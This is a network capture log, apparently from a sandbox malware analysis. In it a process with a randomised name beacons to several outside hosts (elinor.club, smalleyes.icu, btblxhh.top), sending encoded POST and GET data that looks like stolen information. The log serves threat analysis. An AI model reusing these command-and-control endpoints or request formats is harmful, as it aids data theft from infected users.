Jan 11, 2025 05:43:25.310283899 CET | 538 | OUT | GET /fjd6/?UPxHl=S80HqRlhn&rFbdy=beVfoldUF3/aok0KBGpVP1gUCt6NMj5apzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK7lRuvsCGk6bq0J+DGmomegCt+S+Krw== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.pbfgm.xyz
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
Jan 11, 2025 05:43:26.279676914 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:43:26 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BT9j5wwI%2FnJbbeybh1Tzn7pNMs0Ulef8TNyLEgKtg2pmK3VpUv7RZ0ehe1Bt0oLSAyaCIcPhKJlSLvqRKmMN4%2BZOdVPgKuK%2Fik%2BuvAJaemgVZ71hJ1qGAzWAL0wa0w03"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 90023eedbe44430f-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1809&rtt_var=904&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Ascii: 228<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendl
Jan 11, 2025 05:43:26.279706001 CET | 92 | IN
                                                            Data Ascii: y error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49982 | 194.58.112.174 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 05:43:49.641447067 CET | 798 | OUT | POST /1ne4/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.elinor.club
                                                            Origin: http://www.elinor.club
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.elinor.club/1ne4/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=ak3bAasuzQTxEloNruBaN4ELZfgzT7d5gF9G1yIQ8eZICKXAvhaN1DMVLe5WKVQVIIocZSNW0VAvr2+n5jlpxBZrnq+w+TLl1ECyJKWZ+50IGCarXE9D767EMU7GRX2tB3HkKQUPeHEdI8CWkVNc7MNwpsZIEEIXOtb5RRgBEPGmeBBKWf5JtjXSJrwM
Jan 11, 2025 05:43:50.307732105 CET | 341 | IN | HTTP/1.1 302 Moved Temporarily
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:43:50 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 154
                                                            Connection: close
                                                            Location: http://elinor.club/1ne4/
                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49983 | 194.58.112.174 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 05:43:52.186640024 CET | 822 | OUT | POST /1ne4/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.elinor.club
                                                            Origin: http://www.elinor.club
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
                                                            Referer: http://www.elinor.club/1ne4/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=ak3bAasuzQTxFEYNpJVaKYEIW/gzdbdHgF5G1zM68N9ICrnAugaNyDMVfO5XVlQOIIkuZShW0VEvry6n5URm3RZp8a+y6TLl1ECyJKqz+9gIFzqrGV9Aga7LNU7Ga32pB3H8KUMpeEsdI5mWnBRds8M73cYsHUhfHMj0fxgCVI29Zg8NHOYe+ULcHtFm49QmbxgbFCc/Vcu7zgvN/g==
Jan 11, 2025 05:43:52.866033077 CET | 341 | IN | HTTP/1.1 302 Moved Temporarily
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:43:52 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 154
                                                            Connection: close
                                                            Location: http://elinor.club/1ne4/
                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49984 | 194.58.112.174 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 05:43:54.740983009 CET | 1835 | OUT | POST /1ne4/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.elinor.club
                                                            Origin: http://www.elinor.club
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 1230
                                                            Cache-Control: no-cache
                                                            Referer: http://www.elinor.club/1ne4/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Ascii: rFbdy= [TRUNCATED]
Jan 11, 2025 05:43:55.424272060 CET | 341 | IN | HTTP/1.1 302 Moved Temporarily
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:43:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 154
                                                            Connection: close
                                                            Location: http://elinor.club/1ne4/
                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49985 | 194.58.112.174 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 05:43:57.289916992 CET | 540 | OUT | GET /1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI0DRem6aH9Trs8UjwAd6A78giMTOqUw==&UPxHl=S80HqRlhn HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.elinor.club
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
Jan 11, 2025 05:43:57.983772993 CET | 480 | IN | HTTP/1.1 302 Moved Temporarily
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:43:57 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 154
                                                            Connection: close
                                                            Location: http://elinor.club/1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI0DRem6aH9Trs8UjwAd6A78giMTOqUw==&UPxHl=S80HqRlhn
                                                            Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49986 | 134.122.191.187 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 05:44:03.421796083 CET | 804 | OUT | POST /s6zh/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.smalleyes.icu
                                                            Origin: http://www.smalleyes.icu
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.smalleyes.icu/s6zh/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=6nn7X8LHMfZVIW/SkuM7i6PmFdW1N35AjPNqcaSfaFW8S3hrSduSvx/ETntUqSb5MCBrp4xflVbpN5vG6DFVO/9LEDmFt7UO5k46AOqO+IFhNiSmk5kIEQXL8RemuKC0RnKlW/jlcik5GrxYtEZ4PVxEjbzLlPCqu077X/S98uvruPaU2JS3zAU/0kvV
Jan 11, 2025 05:44:04.341135025 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Server: kangle/3.5
                                                            Date: Sat, 11 Jan 2025 04:32:03 GMT
                                                            Set-Cookie: home_lang=cn; path=/
                                                            Content-Type: text/html; charset=utf-8
                                                            X-Cache: MISS from kangle web server
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Ascii: b7e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>404</title><style type="text/css">.concenter-err {width: 100%;background: url(public/static/errpage/error_pic.png);}#warpper {width: 1220px;margin: 0 auto;position: relative;clear: both;font-family: "";}.clearfix {zoom: 1;}.clearfix:after, .clearfix:before {display: block;overflow: hidden;height: 0;content: '\0020';}.error-pic {background: url(public/static/errpage/404.png) no-repeat;}.error-page {width: 658px;height: 641px;margin: 44px auto 0;text-align: center;}.error-page-mb37 {margin-bottom: 37px;}.error-page-txt {padding-top: 391px;margin-bottom: 29px;font-family: \5FAE\8F6F\96C5\9ED1;}.error-page .error-page-txt h3 {font-size: 36px;color: #3B3B3B;font-weight: 900;padding-top: 6px;}.
Jan 11, 2025 05:44:04.341156960 CET | 224 | IN
                                                            Data Ascii: error-page-txt .error-page-pl48 {padding-left: 48px;}.error-page .error-page-txt p {font-size: 16px;color: #6B6B6B;padding-left: 56px;}.error-page-btn {height: 32px;padding-left: 26px;}.error-page-btn a:hover {backgrou
Jan 11, 2025 05:44:04.341166019 CET | 1236 | IN
                                                            Data Ascii: nd-color: #64c7f5;}.clearfix:after {clear: both;}.error-page-btn a {display: inline-block;width: 120px;height: 32px;margin: 0 15px;background-color: #70d2ff;color: white;line-height: 32px;font-size: 14px;text-decoration: none;}</style>
Jan 11, 2025 05:44:04.341171026 CET | 500 | IN
                                                            Data Ascii: rval(intervalCD); return; } if (oSecs == 0){ clearInterval(intervalCD); window.location.href = __root_dir__+'/'; } document.getElementById('J_countdown').innerHTML = oSec


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.10 | 49987 | 134.122.191.187 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:05.968800068 CET | 828 | OUT | POST /s6zh/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.smalleyes.icu
                                                            Origin: http://www.smalleyes.icu
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
                                                            Referer: http://www.smalleyes.icu/s6zh/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=6nn7X8LHMfZVO1nSmJg7zaPpK9W1DX5EjOxqcZfaa3C8SWRrTcuSsx/EcHtRlyb2MCFNp59flV/pN4fG6wdKUP9JCDmHjbUO5k46AOug+OthNRKm2sQLHQXIrhemqKCwRnKHW6fLchM5GrBYt2h7GVwPu7yK1/muiWb+Tcz3odWXkOnTnYzgg3Ix6ia/kBKF1k9b5W2cEUUEdUDiGg==
                                                            Jan 11, 2025 05:44:06.880609035 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Server: kangle/3.5
                                                            Date: Sat, 11 Jan 2025 04:32:06 GMT
                                                            Set-Cookie: home_lang=cn; path=/
                                                            Content-Type: text/html; charset=utf-8
                                                            X-Cache: MISS from kangle web server
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Ascii: b7e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>404</title><style type="text/css">.concenter-err {width: 100%;background: url(public/static/errpage/error_pic.png);}#warpper {width: 1220px;margin: 0 auto;position: relative;clear: both;font-family: "";}.clearfix {zoom: 1;}.clearfix:after, .clearfix:before {display: block;overflow: hidden;height: 0;content: '\0020';}.error-pic {background: url(public/static/errpage/404.png) no-repeat;}.error-page {width: 658px;height: 641px;margin: 44px auto 0;text-align: center;}.error-page-mb37 {margin-bottom: 37px;}.error-page-txt {padding-top: 391px;margin-bottom: 29px;font-family: \5FAE\8F6F\96C5\9ED1;}.error-page .error-page-txt h3 {font-size: 36px;color: #3B3B3B;font-weight: 900;padding-top: 6px;}.
                                                            Jan 11, 2025 05:44:06.880630970 CET | 224 | IN |
                                                            Data Ascii: error-page-txt .error-page-pl48 {padding-left: 48px;}.error-page .error-page-txt p {font-size: 16px;color: #6B6B6B;padding-left: 56px;}.error-page-btn {height: 32px;padding-left: 26px;}.error-page-btn a:hover {backgrou
                                                            Jan 11, 2025 05:44:06.880644083 CET | 1236 | IN |
                                                            Data Ascii: nd-color: #64c7f5;}.clearfix:after {clear: both;}.error-page-btn a {display: inline-block;width: 120px;height: 32px;margin: 0 15px;background-color: #70d2ff;color: white;line-height: 32px;font-size: 14px;text-decoration: none;}</style>
                                                            Jan 11, 2025 05:44:06.880660057 CET | 500 | IN |
                                                            Data Ascii: rval(intervalCD); return; } if (oSecs == 0){ clearInterval(intervalCD); window.location.href = __root_dir__+'/'; } document.getElementById('J_countdown').innerHTML = oSec


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.10 | 49988 | 134.122.191.187 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:08.523514986 CET | 1841 | OUT | POST /s6zh/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.smalleyes.icu
                                                            Origin: http://www.smalleyes.icu
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 1230
                                                            Cache-Control: no-cache
                                                            Referer: http://www.smalleyes.icu/s6zh/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Jan 11, 2025 05:44:09.419831038 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Server: kangle/3.5
                                                            Date: Sat, 11 Jan 2025 04:32:08 GMT
                                                            Set-Cookie: home_lang=cn; path=/
                                                            Content-Type: text/html; charset=utf-8
                                                            X-Cache: MISS from kangle web server
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Ascii: b7e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>404</title><style type="text/css">.concenter-err {width: 100%;background: url(public/static/errpage/error_pic.png);}#warpper {width: 1220px;margin: 0 auto;position: relative;clear: both;font-family: "";}.clearfix {zoom: 1;}.clearfix:after, .clearfix:before {display: block;overflow: hidden;height: 0;content: '\0020';}.error-pic {background: url(public/static/errpage/404.png) no-repeat;}.error-page {width: 658px;height: 641px;margin: 44px auto 0;text-align: center;}.error-page-mb37 {margin-bottom: 37px;}.error-page-txt {padding-top: 391px;margin-bottom: 29px;font-family: \5FAE\8F6F\96C5\9ED1;}.error-page .error-page-txt h3 {font-size: 36px;color: #3B3B3B;font-weight: 900;padding-top: 6px;}.
                                                            Jan 11, 2025 05:44:09.419848919 CET | 224 | IN |
                                                            Data Ascii: error-page-txt .error-page-pl48 {padding-left: 48px;}.error-page .error-page-txt p {font-size: 16px;color: #6B6B6B;padding-left: 56px;}.error-page-btn {height: 32px;padding-left: 26px;}.error-page-btn a:hover {backgrou
                                                            Jan 11, 2025 05:44:09.419859886 CET | 1236 | IN |
                                                            Data Ascii: nd-color: #64c7f5;}.clearfix:after {clear: both;}.error-page-btn a {display: inline-block;width: 120px;height: 32px;margin: 0 15px;background-color: #70d2ff;color: white;line-height: 32px;font-size: 14px;text-decoration: none;}</style>
                                                            Jan 11, 2025 05:44:09.419919014 CET | 224 | IN |
                                                            Data Ascii: rval(intervalCD); return; } if (oSecs == 0){ clearInterval(intervalCD); window.location.href = __root_dir__+'/'; } document.getElementById('J_countdown
                                                            Jan 11, 2025 05:44:09.419929981 CET | 276 | IN |
                                                            Data Ascii: ').innerHTML = oSecs; } var intervalDomID = setInterval(function () { if (document.getElementById('J_countdown')) { clearInterval(intervalDomID); intervalCD = setInterval(time, 1000); } }, 100);<


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.10 | 49989 | 134.122.191.187 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:11.070925951 CET | 542 | OUT | GET /s6zh/?rFbdy=3lPbUJ/4EMFnMU31nNkM0sT5MNepbRdhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsBqJqOmuwjboa7nAzI9uQyNNQORSZ1w==&UPxHl=S80HqRlhn HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.smalleyes.icu
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Jan 11, 2025 05:44:11.998029947 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Server: kangle/3.5
                                                            Date: Sat, 11 Jan 2025 04:32:11 GMT
                                                            Set-Cookie: home_lang=cn; path=/
                                                            Content-Type: text/html; charset=utf-8
                                                            X-Cache: MISS from kangle web server
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Ascii: b7e<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>404</title><style type="text/css">.concenter-err {width: 100%;background: url(public/static/errpage/error_pic.png);}#warpper {width: 1220px;margin: 0 auto;position: relative;clear: both;font-family: "";}.clearfix {zoom: 1;}.clearfix:after, .clearfix:before {display: block;overflow: hidden;height: 0;content: '\0020';}.error-pic {background: url(public/static/errpage/404.png) no-repeat;}.error-page {width: 658px;height: 641px;margin: 44px auto 0;text-align: center;}.error-page-mb37 {margin-bottom: 37px;}.error-page-txt {padding-top: 391px;margin-bottom: 29px;font-family: \5FAE\8F6F\96C5\9ED1;}.error-page .error-page-txt h3 {font-size: 36px;color: #3B3B3B;font-weight: 900;padding-top: 6px;}.
                                                            Jan 11, 2025 05:44:11.998055935 CET | 224 | IN |
                                                            Data Ascii: error-page-txt .error-page-pl48 {padding-left: 48px;}.error-page .error-page-txt p {font-size: 16px;color: #6B6B6B;padding-left: 56px;}.error-page-btn {height: 32px;padding-left: 26px;}.error-page-btn a:hover {backgrou
                                                            Jan 11, 2025 05:44:11.998064995 CET | 1236 | IN |
                                                            Data Ascii: nd-color: #64c7f5;}.clearfix:after {clear: both;}.error-page-btn a {display: inline-block;width: 120px;height: 32px;margin: 0 15px;background-color: #70d2ff;color: white;line-height: 32px;font-size: 14px;text-decoration: none;}</style>
                                                            Jan 11, 2025 05:44:11.998155117 CET | 500 | IN |
                                                            Data Ascii: rval(intervalCD); return; } if (oSecs == 0){ clearInterval(intervalCD); window.location.href = __root_dir__+'/'; } document.getElementById('J_countdown').innerHTML = oSec


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.10 | 49990 | 156.234.28.101 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:17.858517885 CET | 798 | OUT | POST /dp9c/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.btblxhh.top
                                                            Origin: http://www.btblxhh.top
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 194
                                                            Cache-Control: no-cache
                                                            Referer: http://www.btblxhh.top/dp9c/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=SK8iALUXp2haLrl5pv8s1UcLa5mkS3GPTTckjAG77ylTjSnMEe5doGAHOmFtrsioVLL4vkEZtJfBdEy4daSfImLWWgY5OvLQXlencce7Fd9+QEbQYxp+W1BncPMJce4R4KefD4bkqCRqj51g4sBnEDiehn4k4QnYiOAA+N513tmkFUHV27qXELQY4ei7
                                                            Jan 11, 2025 05:44:18.744225979 CET | 1135 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:44:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.10 | 49991 | 156.234.28.101 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:20.408540010 CET | 822 | OUT | POST /dp9c/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.btblxhh.top
                                                            Origin: http://www.btblxhh.top
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 218
                                                            Cache-Control: no-cache
                                                            Referer: http://www.btblxhh.top/dp9c/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                            Data Ascii: rFbdy=SK8iALUXp2haKPh5u8ksiEcUGJmkcXHGTTgkjDL28ABTjy3MHf5dlmAHaWEllMjqVLHvvl4ZtJLBdFC4dp6cJ2LQDQY7KvLQXlenccaFFdl+Q3TQZSx9IFBkVvMJYe4V4KfID53CqApqj7dg49BmTzicln5azB/VuOAt0cpG1sC/C16SnqLAX8MW2YXRQgDGZHuk6ZutF5r3CP9cnw==
                                                            Jan 11, 2025 05:44:21.251699924 CET | 1135 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Sat, 11 Jan 2025 04:44:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            11 | 192.168.2.10 | 49992 | 156.234.28.101 | 80 | 6336 | C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 05:44:22.952580929 CET | 1835 | OUT | POST /dp9c/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.btblxhh.top
                                                            Origin: http://www.btblxhh.top
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Content-Length: 1230
                                                            Cache-Control: no-cache
                                                            Referer: http://www.btblxhh.top/dp9c/
